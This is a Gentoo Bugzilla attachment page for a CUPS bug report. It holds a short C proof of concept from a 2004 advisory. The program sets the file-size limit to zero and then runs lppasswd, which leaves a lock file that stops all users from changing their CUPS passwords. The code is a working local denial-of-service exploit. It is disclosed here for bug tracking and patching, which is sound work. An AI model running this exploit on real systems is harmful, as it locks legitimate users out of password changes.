Go to:
Gentoo Home
Documentation
Forums
Lists
Bugs
Planet
Store
Wiki
Get Gentoo!
Gentoo's Bugzilla – Attachment 46031 Details for
Bug 74479
net-print/cups: buffer overflows in HPGL files; lppasswd ignores write errors, etc.
Home
|
New
–
[Ex]
|
Browse
|
Search
|
Privacy Policy
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
63.c from advisory
bug74479-63.c (text/plain), 1.17 KB, created by
Sascha Silbe
on 2004-12-15 05:23:32 UTC
(
hide
)
Description:
63.c from advisory
Filename:
MIME Type:
Creator:
Sascha Silbe
Created:
2004-12-15 05:23:32 UTC
Size:
1.17 KB
patch
obsolete
>/* > * evil.c > * 2004.12.11 > * Bartlomiej Sieka > * > * This program executes the lpasswd(1) password changing utility > * in way that prevents its further use, i.e. after this program > * has been executed, all users on the system will be unable to change > * their CUPS passwords. This is not a documented feature of lppasswd(1) > * and is certainly unauthorized. > * > * This program has been tested with lppasswd(1) versions 1.1.19 and > * 1.1.22 on FreeBSD 5.2. > * > * The recipe: > * gcc -o evil evil.c > * ./evil > * Type in passwords as requested, and voila! This will create an empty > * file /usr/local/etc/cups/passwd.new. The existence of this file makes > * lppasswd(1) quit before changing users password with message > * "lppasswd: Password file busy!". > */ > >#include <sys/types.h> >#include <sys/time.h> >#include <sys/resource.h> >#include <unistd.h> >extern char **environ; > >int main(int argc, char **argv){ > > char *cmd = "/usr/local/bin/lppasswd"; > char *args[] = { "/usr/local/bin/lppasswd", 0x00 }; > > /* set the file size limit to 0 */ > struct rlimit rl; > rl.rlim_cur = 0; > rl.rlim_max = 0; > setrlimit(RLIMIT_FSIZE, &rl); > > /* execute the poor victim */ > execve(cmd, args, environ); >}
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 74479
: 46031